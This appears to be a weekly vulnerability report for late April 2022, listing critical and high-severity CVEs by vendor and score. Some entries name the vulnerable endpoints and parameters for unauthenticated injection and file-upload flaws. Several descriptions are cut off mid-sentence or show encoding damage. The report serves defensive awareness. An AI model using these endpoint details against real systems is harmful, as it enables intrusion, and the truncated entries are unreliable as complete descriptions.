Weekly Vulnerabilities Reports > April 25 to May 1, 2022
Overview
310 new vulnerabilities were reported during this period, including 66 critical vulnerabilities and 107 high severity vulnerabilities. This weekly summary reports vulnerabilities in 340 products from 199 vendors including IBM, Fedoraproject, Debian, Jetbrains, and Redhat. Vulnerabilities are notably categorized as "Cross-site Scripting", "Path Traversal", "Out-of-bounds Write", "SQL Injection", and "Missing Authorization".
- 253 reported vulnerabilities are remotely exploitable.
- 93 reported vulnerabilities are related to weaknesses in the OWASP Top Ten.
- 178 reported vulnerabilities are exploitable by an anonymous user.
- IBM has the most reported vulnerabilities, with 19 reported vulnerabilities.
- Mediawiki has the most reported critical vulnerabilities, with 2 reported vulnerabilities.
Vulnerability Details
The following tables list the reported vulnerabilities for the period covered by this report:
66 Critical Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-30 | CVE-2021-42001 | Pingidentity | Unspecified vulnerability in Pingidentity Pingid Desktop PingID Desktop prior to 1.7.3 has a misconfiguration in the encryption libraries which can lead to sensitive data exposure. | 9.9 |
2022-05-01 | CVE-2022-25301 | Jsgui Lang Essentials Project | Unspecified vulnerability in Jsgui-Lang-Essentials Project Jsgui-Lang-Essentials All versions of package jsgui-lang-essentials are vulnerable to Prototype Pollution due to allowing all Object attributes to be altered, including their magical attributes such as proto, constructor and prototype. | 9.8 |
2022-05-01 | CVE-2022-21167 | Ldqk | Unspecified vulnerability in Ldqk Masuit.Tools All versions of package masuit.tools.core are vulnerable to Arbitrary Code Execution via the ReceiveVarData<T> function in the SocketClient.cs component. | 9.8 |
2022-05-01 | CVE-2022-21189 | Dexie | Unspecified vulnerability in Dexie The package dexie before 3.2.2, from 4.0.0-alpha.1 and before 4.0.0-alpha.3 are vulnerable to Prototype Pollution in the Dexie.setByKeyPath(obj, keyPath, value) function which does not properly check the keys being set (like __proto__ or constructor). | 9.8 |
2022-05-01 | CVE-2022-22143 | Mozilla | Unspecified vulnerability in Mozilla Convict The package convict before 6.2.2 are vulnerable to Prototype Pollution via the convict function due to missing validation of parentKey. | 9.8 |
2022-05-01 | CVE-2022-23923 | Jailed Project | Unspecified vulnerability in Jailed Project Jailed All versions of package jailed are vulnerable to Sandbox Bypass via an exported alert() method which can access the main application. | 9.8 |
2022-05-01 | CVE-2022-24437 | GIT Pull OR Clone Project | Argument Injection or Modification vulnerability in Git-Pull-Or-Clone Project Git-Pull-Or-Clone The package git-pull-or-clone before 2.0.2 are vulnerable to Command Injection due to the use of the --upload-pack feature of git which is also supported for git clone. | 9.8 |
2022-05-01 | CVE-2022-25767 | Ureport2 Project | Deserialization of Untrusted Data vulnerability in Ureport2 Project Ureport2 All versions of package com.bstek.ureport:ureport2-console are vulnerable to Remote Code Execution by connecting to a malicious database server, causing arbitrary file read and deserialization of local gadgets. | 9.8 |
2022-05-01 | CVE-2022-25842 | Alibabagroup | Path Traversal vulnerability in Alibabagroup One-Java-Agent All versions of package com.alibaba.oneagent:one-java-agent-plugin are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) using a specially crafted archive that holds directory traversal filenames (e.g. | 9.8 |
2022-05-01 | CVE-2022-28481 | CSV Safe Project | Improper Neutralization of Formula Elements in a CSV File vulnerability in Csv-Safe Project Csv-Safe CSV-Safe gem < 3.0.0 doesn't filter out special characters which could trigger CSV Injection. | 9.8 |
2022-04-29 | CVE-2022-28480 | Allmediaserver | Classic Buffer Overflow vulnerability in Allmediaserver 1.6 ALLMediaServer 1.6 is vulnerable to Buffer Overflow via MediaServer.exe. | 9.8 |
2022-04-29 | CVE-2022-28994 | Smallsrv | Classic Buffer Overflow vulnerability in Smallsrv Small Http Server 3.06 Small HTTP Server version 3.06 suffers from a remote buffer overflow vulnerability via long GET request. | 9.8 |
2022-04-29 | CVE-2021-43938 | Smartptt | Missing Authorization vulnerability in Smartptt Scada Server 1.4 Elcomplus SmartPTT SCADA Server is vulnerable because an unauthenticated user can request various files from the server without any authentication or authorization. | 9.8 |
2022-04-29 | CVE-2022-28452 | Redplanetcomputers | SQL Injection vulnerability in Redplanetcomputers Laundry Management System 1.0 Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection. | 9.8 |
2022-04-29 | CVE-2021-44596 | Wondershare | Unspecified vulnerability in Wondershare Dr.Fone 20211206 Wondershare LTD Dr. | 9.8 |
2022-04-29 | CVE-2022-1531 | RTX Project | SQL Injection vulnerability in RTX Project RTX SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in GitHub repository rtxteam/rtx prior to checkpoint_2022-04-20 . | 9.8 |
2022-04-29 | CVE-2022-29904 | Mediawiki | SQL Injection vulnerability in Mediawiki The SemanticDrilldown extension for MediaWiki through 1.37.2 (before e688bdba6434591b5dff689a45e4d53459954773) allows SQL injection with certain '-' and '_' constraints. | 9.8 |
2022-04-29 | CVE-2022-29906 | Mediawiki | Missing Authorization vulnerability in Mediawiki The admin API module in the QuizGame extension for MediaWiki through 1.37.2 (before 665e33a68f6fa1167df99c0aa18ed0157cdf9f66) omits a check for the quizadmin user. | 9.8 |
2022-04-28 | CVE-2022-24449 | RT Solar | Server-Side Request Forgery (SSRF) vulnerability in Rt-Solar Solar Appscreener 3.10.4 Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document. | 9.8 |
2022-04-28 | CVE-2022-29081 | Zohocorp | Path Traversal vulnerability in Zohocorp products Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. | 9.8 |
2022-04-28 | CVE-2022-29556 | Northern Tech | Server-Side Request Forgery (SSRF) vulnerability in Northern.Tech Mender 3.2.0/3.2.1 The iot-manager microservice 1.0.0 in Northern.tech Mender Enterprise before 3.2.2 allows SSRF because the Azure IoT Hub integration provides several SSRF primitives that can execute cross-tenant actions via internal API endpoints. | 9.8 |
2022-04-28 | CVE-2022-29411 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress allows attackers to execute SQLi attack via (&id). | 9.8 |
2022-04-28 | CVE-2021-43934 | Smartptt | Unspecified vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable as the backup and restore system does not adequately validate upload requests, enabling a malicious user to potentially upload arbitrary files. | 9.8 |
2022-04-28 | CVE-2021-41921 | Xxyopen | Unrestricted Upload of File with Dangerous Type vulnerability in Xxyopen Novel-Plus 3.6.1 novel-plus V3.6.1 allows unrestricted file uploads. | 9.8 |
2022-04-28 | CVE-2022-28719 | Hammock | Missing Authentication for Critical Function vulnerability in Hammock Assetview 9.2 Missing authentication for critical function in AssetView prior to Ver.13.2.0 allows a remote unauthenticated attacker with some knowledge on the system configuration to upload a crafted configuration file to the managing server, which may result in the managed clients to execute arbitrary code with the administrative privilege. | 9.8 |
2022-04-27 | CVE-2022-29859 | Amb1 SDK Project | Unspecified vulnerability in Amb1 SDK Project Amb1 SDK component/common/network/dhcp/dhcps.c in ambiot amb1_sdk (aka SDK for Ameba1) before 2022-03-11 mishandles data structures for DHCP packet data. | 9.8 |
2022-04-27 | CVE-2021-34601 | Bender | Use of Hard-coded Credentials vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Hardcoded Credentials. | 9.8 |
2022-04-27 | CVE-2021-38869 | IBM | Session Fixation vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 in some situations may not automatically log users out after they exceed their idle timeout. | 9.8 |
2022-04-27 | CVE-2022-27336 | Seacms | Unspecified vulnerability in Seacms 11.6 Seacms v11.6 was discovered to contain a remote code execution (RCE) vulnerability via the component /admin/weixin.php. | 9.8 |
2022-04-27 | CVE-2021-46422 | Telesquare | OS Command Injection vulnerability in Telesquare Sdt-Cs3B1 Firmware 1.1.0 Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. | 9.8 |
2022-04-27 | CVE-2021-46442 | Dlink | Unspecified vulnerability in Dlink Dir-825 Firmware In the "webupg" binary of D-Link DIR-825 G1, attackers can bypass authentication through parameters "autoupgrade.asp", and perform functions such as downloading configuration files and updating firmware without authorization. | 9.8 |
2022-04-26 | CVE-2022-28521 | Zcms Project | Unspecified vulnerability in Zcms Project Zcms 20170206 ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config. | 9.8 |
2022-04-26 | CVE-2022-28524 | Ed01 CMS Project | SQL Injection vulnerability in Ed01-Cms Project Ed01-Cms 20180505 ED01-CMS v20180505 was discovered to contain a SQL injection vulnerability via the component post.php. | 9.8 |
2022-04-26 | CVE-2022-24881 | Ballcat | Improper Input Validation vulnerability in Ballcat Codegen Ballcat Codegen provides the function of online editing code to generate templates. | 9.8 |
2022-04-26 | CVE-2022-24883 | Freerdp Fedoraproject | Improper Authentication vulnerability in multiple products FreeRDP is a free implementation of the Remote Desktop Protocol (RDP). | 9.8 |
2022-04-26 | CVE-2022-27299 | Hospital Management System Project | SQL Injection vulnerability in Hospital Management System Project Hospital Management System 1.0 Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the component room.php. | 9.8 |
2022-04-26 | CVE-2022-27468 | Monstaftp | Unrestricted Upload of File with Dangerous Type vulnerability in Monstaftp Monsta FTP 2.10.3 Monstaftp v2.10.3 was discovered to contain an arbitrary file upload which allows attackers to execute arbitrary code via a crafted file uploaded to the web server. | 9.8 |
2022-04-26 | CVE-2022-27469 | Monstaftp | Server-Side Request Forgery (SSRF) vulnerability in Monstaftp Monsta FTP 2.10.3 Monstaftp v2.10.3 was discovered to allow attackers to execute Server-Side Request Forgery (SSRF). | 9.8 |
2022-04-26 | CVE-2022-27984 | Cuppacms | SQL Injection vulnerability in Cuppacms 1.0 CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php. | 9.8 |
2022-04-26 | CVE-2022-27985 | Cuppacms | SQL Injection vulnerability in Cuppacms 1.0 CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php. | 9.8 |
2022-04-26 | CVE-2022-24706 | Apache | Unspecified vulnerability in Apache Couchdb In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. | 9.8 |
2022-04-26 | CVE-2022-29806 | Zoneminder | Path Traversal vulnerability in Zoneminder ZoneMinder before 1.36.13 allows remote code execution via an invalid language. | 9.8 |
2022-04-26 | CVE-2022-29499 | Mitel | Improper Input Validation vulnerability in Mitel Mivoice Connect The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. | 9.8 |
2022-04-25 | CVE-2022-23457 | Owasp Oracle Netapp | ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. | 9.8 |
2022-04-25 | CVE-2022-25866 | GIT PHP Project | Argument Injection or Modification vulnerability in Git-PHP Project Git-PHP The package czproject/git-php before 4.0.3 are vulnerable to Command Injection via git argument injection. | 9.8 |
2022-04-25 | CVE-2022-0541 | Flothemes | Unspecified vulnerability in Flothemes Flo-Launch The flo-launch WordPress plugin before 2.4.1 injects code into wp-config.php when creating a cloned site, allowing any attacker to initiate a new site install by setting the flo_custom_table_prefix cookie to an arbitrary value. | 9.8 |
2022-04-25 | CVE-2022-0657 | 5 Stars Rating Funnel Project | Unspecified vulnerability in 5 Stars Rating Funnel Project 5 Stars Rating Funnel The 5 Stars Rating Funnel WordPress Plugin \| RRatingg WordPress plugin before 1.2.54 does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue. | 9.8 |
2022-04-25 | CVE-2022-0693 | Devbunch | SQL Injection vulnerability in Devbunch Master Elements The Master Elements WordPress plugin through 8.0 does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL Injection | 9.8 |
2022-04-25 | CVE-2022-0769 | Usersultra | Unspecified vulnerability in Usersultra Users Ultra The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection. | 9.8 |
2022-04-25 | CVE-2022-0782 | Donations Project | Unspecified vulnerability in Donations Project Donations The Donations WordPress plugin through 1.8 does not sanitise and escape the nd_donations_id parameter before using it in a SQL statement via the nd_donations_single_cause_form_validate_fields_php_function AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection | 9.8 |
2022-04-25 | CVE-2022-1390 | Admin Word Count Column Project | Unspecified vulnerability in Admin Word Count Column Project Admin Word Count Column The Admin Word Count Column WordPress plugin through 2.2 does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. | 9.8 |
2022-04-25 | CVE-2022-1391 | Kanev | Unspecified vulnerability in Kanev CAB Fare Calculator 1.0.3 The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues. | 9.8 |
2022-04-25 | CVE-2022-28093 | Online Sports Complex Booking System Project | Unspecified vulnerability in Online Sports Complex Booking System Project Online Sports Complex Booking System 1.0 SCBS Online Sports Venue Reservation System v1.0 was discovered to contain a local file inclusion vulnerability which allow attackers to execute arbitrary code via a crafted PHP file. | 9.8 |
2022-04-25 | CVE-2022-29078 | EJS | Code Injection vulnerability in EJS 3.1.6 The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. | 9.8 |
2022-04-25 | CVE-2022-27311 | Gibbon Project | Server-Side Request Forgery (SSRF) vulnerability in Gibbon Project Gibbon Gibbon v3.4.4 and below allows attackers to execute a Server-Side Request Forgery (SSRF) via a crafted URL. | 9.8 |
2022-04-25 | CVE-2022-27429 | Jizhicms | Server-Side Request Forgery (SSRF) vulnerability in Jizhicms 1.9.5 Jizhicms v1.9.5 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability via /admin.php/Plugins/update.html. | 9.8 |
2022-04-25 | CVE-2021-45837 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to execute arbitrary commands as root in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) by sending a specifically crafted input to /tos/index.php?app/del. | 9.8 |
2022-04-25 | CVE-2021-45840 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to execute arbitrary commands as root in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) by sending specifically crafted input to /tos/index.php?app/app_start_stop. | 9.8 |
2022-04-25 | CVE-2022-29264 | Coreboot | Unspecified vulnerability in Coreboot An issue was discovered in coreboot 4.13 through 4.16. | 9.8 |
2022-04-25 | CVE-2022-29077 | Ripple | Out-of-bounds Write vulnerability in Ripple Rippled A heap-based buffer overflow exists in rippled before 1.8.5. | 9.8 |
2022-04-28 | CVE-2022-28114 | Dscms Project | Unspecified vulnerability in Dscms Project Dscms 3.0 DSCMS v3.0 was discovered to contain an arbitrary file deletion vulnerability via /controller/Adv.php. | 9.1 |
2022-04-28 | CVE-2021-41945 | Encode | Improper Input Validation vulnerability in Encode Httpx Encode OSS httpx < 0.23.0 is affected by improper input validation in `httpx.URL`, `httpx.Client` and some functions using `httpx.URL.copy_with`. | 9.1 |
2022-04-27 | CVE-2021-46424 | Telesquare | Unspecified vulnerability in Telesquare Tlr-2005Ksh Firmware 1.0.0 Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. | 9.1 |
2022-04-27 | CVE-2022-27332 | Zammad | Missing Authentication for Critical Function vulnerability in Zammad An access control issue in Zammad v5.0.3 allows attackers to write entries to the CTI caller log without authentication. | 9.1 |
2022-04-28 | CVE-2022-28101 | Lyonbros | Cross-site Scripting vulnerability in Lyonbros Turtl 0.7.2.6 Turtlapp Turtle Note v0.7.2.6 does not filter the <meta> tag during markdown parsing, allowing attackers to execute HTML injection. | 9.0 |
2022-04-27 | CVE-2022-28464 | Apifox | Cross-site Scripting vulnerability in Apifox Apifox through 2.1.6 is vulnerable to Cross Site Scripting (XSS) which can lead to remote code execution. | 9.0 |
107 High Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-29 | CVE-2022-1543 | Erudika | Unspecified vulnerability in Erudika Scoold Improper handling of Length parameter in GitHub repository erudika/scoold prior to 1.49.4. | 8.8 |
2022-04-29 | CVE-2021-36207 | Johnsoncontrols | Improper Privilege Management vulnerability in Johnsoncontrols products Under certain circumstances improper privilege management in Metasys ADS/ADX/OAS servers versions 10 and 11 could allow an authenticated user to elevate their privileges to administrator. | 8.8 |
2022-04-29 | CVE-2022-29451 | Rarathemes | Unspecified vulnerability in Rarathemes Rara ONE Click Demo Import Cross-Site Request Forgery (CSRF) leading to Arbitrary File Upload vulnerability in Rara One Click Demo Import plugin <= 1.2.9 on WordPress allows attackers to trick logged-in admin users into uploading dangerous files into /wp-content/uploads/ directory. | 8.8 |
2022-04-29 | CVE-2022-29936 | USU | Deserialization of Untrusted Data vulnerability in USU Oracle Optimization 5.16.2 USU Oracle Optimization before 5.17 allows authenticated quantum users to achieve remote code execution because of /v2/quantum/save-data-upload-big-file Java deserialization. | 8.8 |
2022-04-29 | CVE-2022-29937 | USU | OS Command Injection vulnerability in USU Oracle Optimization 20210817 USU Oracle Optimization before 5.17.5 allows authenticated DataCollection users to achieve agent root access because some common OS commands are blocked but (for example) an OS command for base64 decoding is not blocked. | 8.8 |
2022-04-29 | CVE-2021-43937 | Smartptt | Cross-Site Request Forgery (CSRF) vulnerability in Smartptt Scada Server 1.4 Elcomplus SmartPTT SCADA Server web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. | 8.8 |
2022-04-29 | CVE-2022-1227 | Podman Project Psgo Project Redhat Fedoraproject | Improper Privilege Management vulnerability in multiple products A privilege escalation flaw was found in Podman. | 8.8 |
2022-04-29 | CVE-2021-44595 | Wondershare | Missing Authorization vulnerability in Wondershare Dr.Fone 20211206 Wondershare Dr. | 8.8 |
2022-04-28 | CVE-2022-29555 | Northern Tech | Cross-Site Request Forgery (CSRF) vulnerability in Northern.Tech Mender The Deviceconnect microservice through 1.3.0 in Northern.tech Mender Enterprise before 3.2.2. | 8.8 |
2022-04-28 | CVE-2022-29410 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 Authenticated SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress allows attackers with Subscriber or higher user roles to execute SQLi attack via (&ids). | 8.8 |
2022-04-28 | CVE-2022-28892 | Mahara | Cross-Site Request Forgery (CSRF) vulnerability in Mahara Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 is vulnerable to Cross Site Request Forgery (CSRF) because randomly generated tokens are too easily guessable. | 8.8 |
2022-04-28 | CVE-2021-43939 | Smartptt | Unspecified vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable when a low-authenticated user can access higher level administration authorization by issuing requests directly to the desired endpoints. | 8.8 |
2022-04-28 | CVE-2022-1509 | Hestiacp | Unspecified vulnerability in Hestiacp Control Panel Command Injection Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.12. | 8.8 |
2022-04-27 | CVE-2022-22315 | IBM | Unspecified vulnerability in IBM Urbancode Deploy IBM UrbanCode Deploy (UCD) 7.2.2.1 could allow an authenticated user with special permissions to obtain elevated privileges due to improper handling of permissions. | 8.8 |
2022-04-27 | CVE-2021-34592 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. | 8.8 |
2022-04-27 | CVE-2021-34602 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. | 8.8 |
2022-04-27 | CVE-2021-46441 | Dlink | OS Command Injection vulnerability in Dlink Dir-825 Firmware In the "webupg" binary of D-Link DIR-825 G1, because of the lack of parameter verification, attackers can use "cmd" parameters to execute arbitrary system commands after obtaining authorization. | 8.8 |
2022-04-26 | CVE-2022-28525 | Ed01 CMS Project | Unrestricted Upload of File with Dangerous Type vulnerability in Ed01-Cms Project Ed01-Cms 20180505 ED01-CMS v20180505 was discovered to contain an arbitrary file upload vulnerability via /admin/users.php?source=edit_user&id=1. | 8.8 |
2022-04-26 | CVE-2022-28528 | Bloofox | Unrestricted Upload of File with Dangerous Type vulnerability in Bloofox Bloofoxcms 0.5.2.1 bloofoxCMS v0.5.2.1 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?mode=content&page=media&action=edit. | 8.8 |
2022-04-26 | CVE-2021-26629 | Tobesoft | Path Traversal vulnerability in Tobesoft Xplatform A path traversal vulnerability in XPLATFORM's runtime archive function could lead to arbitrary file creation. | 8.8 |
2022-04-25 | CVE-2022-29419 | 3Xsocializer Project | Unspecified vulnerability in 3Xsocializer Project 3Xsocializer 0.98.22 SQL Injection (SQLi) vulnerability in Don Crowther's 3xSocializer plugin <= 0.98.22 at WordPress possible for users with a low role like a subscriber or higher. | 8.8 |
2022-04-25 | CVE-2021-24957 | Advanced Page Visit Counter Project | Unspecified vulnerability in Advanced Page Visit Counter Project Advanced Page Visit Counter The Advanced Page Visit Counter WordPress plugin before 6.1.6 does not escape the artID parameter before using it in a SQL statement in the apvc_reset_count_art AJAX action, available to any authenticated user, leading to a SQL injection | 8.8 |
2022-04-25 | CVE-2021-4225 | Smartypantsplugins | Unspecified vulnerability in Smartypantsplugins SP Project & Document Manager The SP Project & Document Manager WordPress plugin before 4.24 allows any authenticated users, such as subscribers, to upload files. | 8.8 |
2022-04-25 | CVE-2022-26111 | Canon | Expression Language Injection vulnerability in Canon Irisnext 9.8.28 The BeanShell components of IRISNext through 9.8.28 allow execution of arbitrary commands on the target server by creating a custom search (or editing an existing/predefined search) of the documents. | 8.8 |
2022-04-25 | CVE-2022-28053 | Typemill | Unrestricted Upload of File with Dangerous Type vulnerability in Typemill 1.5.3 Typemill v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the upload function. | 8.8 |
2022-04-25 | CVE-2021-45836 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 An authenticated attacker can execute arbitrary commands as root in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) by injecting a maliciously crafted input in the request through /tos/index.php?app/hand_app. | 8.8 |
2022-04-29 | CVE-2022-24900 | Piano LED Visualizer Project | Exposure of Resource to Wrong Sphere vulnerability in Piano LED Visualizer Project Piano LED Visualizer Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. | 8.6 |
2022-04-27 | CVE-2021-34588 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to unprotected data export. | 8.6 |
2022-04-25 | CVE-2022-1459 | Open EMR | Authorization Bypass Through User-Controlled Key vulnerability in Open-Emr Openemr Non-Privilege User Can View Patient’s Disclosures in GitHub repository openemr/openemr prior to 6.1.0.1. | 8.3 |
2022-04-29 | CVE-2021-4206 | Qemu Redhat Debian | Incorrect Calculation of Buffer Size vulnerability in multiple products A flaw was found in the QXL display device emulation in QEMU. | 8.2 |
2022-04-29 | CVE-2021-4207 | Qemu Redhat Debian | Classic Buffer Overflow vulnerability in multiple products A flaw was found in the QXL display device emulation in QEMU. | 8.2 |
2022-05-01 | CVE-2022-25645 | Dset Project | Unspecified vulnerability in Dset Project Dset All versions of package dset are vulnerable to Prototype Pollution via 'dset/merge' mode, as the dset function checks for prototype pollution by validating if the top-level path contains __proto__, constructor or prototype. | 8.1 |
2022-04-26 | CVE-2022-28058 | Verydows | Path Traversal vulnerability in Verydows 2.0 Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\file_controller.php. | 8.1 |
2022-04-26 | CVE-2022-28059 | Verydows | Path Traversal vulnerability in Verydows 2.0 Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\database_controller.php. | 8.1 |
2022-04-26 | CVE-2022-28523 | Hongcms Project | Path Traversal vulnerability in Hongcms Project Hongcms 3.0.0 HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete. | 8.1 |
2022-04-26 | CVE-2022-28527 | Dhcms Project | Path Traversal vulnerability in Dhcms Project Dhcms 20170919 dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del. | 8.1 |
2022-04-26 | CVE-2022-28918 | Njtech | Unspecified vulnerability in Njtech Greencms 2.3.0603 GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=. | 8.1 |
2022-04-25 | CVE-2021-25094 | Brandexponents | Unspecified vulnerability in Brandexponents Tatsu The Tatsu WordPress plugin before 3.3.12 add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress's upload directory. | 8.1 |
2022-04-25 | CVE-2021-45841 | Terra Master | Use of Hard-coded Credentials vulnerability in Terra-Master TOS 4.2.152107141517 In Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517), an attacker can self-sign session cookies by knowing the target's MAC address and the user's password hash. | 8.1 |
2022-04-25 | CVE-2021-40680 | Articatech | Path Traversal vulnerability in Articatech web Proxy 4.30.000000 There is a Directory Traversal vulnerability in Artica Proxy (4.30.000000 SP206 through SP255, and VMware appliance 4.30.000000 through SP273) via the filename parameter to /cgi-bin/main.cgi. | 8.1 |
2022-04-25 | CVE-2022-29603 | Universis | SQL Injection vulnerability in Universis Universis-Api A SQL Injection vulnerability exists in UniverSIS UniverSIS-API through 1.2.1 via the $select parameter to multiple API endpoints. | 8.1 |
2022-04-25 | CVE-2021-39040 | IBM | Unrestricted Upload of File with Dangerous Type vulnerability in IBM Planning Analytics Workspace 2.0 IBM Planning Analytics Workspace 2.0 could be vulnerable to malicious file upload by not validating the file types or sizes. | 8.0 |
2022-05-01 | CVE-2022-1544 | Luya | Improper Neutralization of Formula Elements in a CSV File vulnerability in Luya Yii-Helpers Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. | 7.8 |
2022-04-29 | CVE-2022-1403 | Deltaww | Out-of-bounds Write vulnerability in Deltaww Asda Soft 5.4.1.0 ASDA-Soft: Version 5.4.1.0 and prior does not properly sanitize input while processing a specific project file, allowing a possible out-of-bounds write condition. | 7.8 |
2022-04-29 | CVE-2022-29934 | USU | Missing Authentication for Critical Function vulnerability in USU Oracle Optimization 5.16.2 USU Oracle Optimization before 5.17.5 lacks Polkit authentication, which allows smartcollector users to achieve root access via pkexec. | 7.8 |
2022-04-29 | CVE-2022-1533 | Libmobi Project | Out-of-bounds Read vulnerability in Libmobi Project Libmobi Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11. | 7.8 |
2022-04-27 | CVE-2022-24735 | Redis Fedoraproject Netapp Oracle | Redis is an in-memory database that persists on disk. | 7.8 |
2022-04-27 | CVE-2021-34591 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Local privilege Escalation. | 7.8 |
2022-04-27 | CVE-2022-29505 | Linecorp | Unspecified vulnerability in Linecorp Line Due to build misconfiguration in openssl dependency, LINE for Windows before 7.8 is vulnerable to DLL injection that could lead to privilege escalation. | 7.8 |
2022-04-27 | CVE-2022-27239 | Samba Debian Suse HP Fedoraproject | Out-of-bounds Write vulnerability in multiple products In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges. | 7.8 |
2022-04-27 | CVE-2022-28085 | Htmldoc Project | Out-of-bounds Write vulnerability in Htmldoc Project Htmldoc A flaw was found in htmldoc commit 31f7804. | 7.8 |
2022-04-25 | CVE-2022-1441 | Gpac Debian | Out-of-bounds Read vulnerability in multiple products MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. | 7.8 |
2022-04-25 | CVE-2022-22392 | IBM | Unrestricted Upload of File with Dangerous Type vulnerability in IBM Planning Analytics Workspace 2.0 IBM Planning Analytics Local 2.0 could allow an attacker to upload arbitrary executable files which, when executed by an unsuspecting victim could result in code execution. | 7.8 |
2022-04-25 | CVE-2021-36460 | Veryfitpro Project | Improper Authentication vulnerability in Veryfitpro Project Veryfitpro VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. | 7.8 |
2022-04-25 | CVE-2019-25059 | Artifex Debian | Artifex Ghostscript through 9.26 mishandles .completefont. | 7.8 |
2022-04-28 | CVE-2022-29814 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via HTML descriptions in custom JSON schemas was possible | 7.7 |
2022-04-28 | CVE-2022-29819 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via links in Quick Documentation was possible | 7.7 |
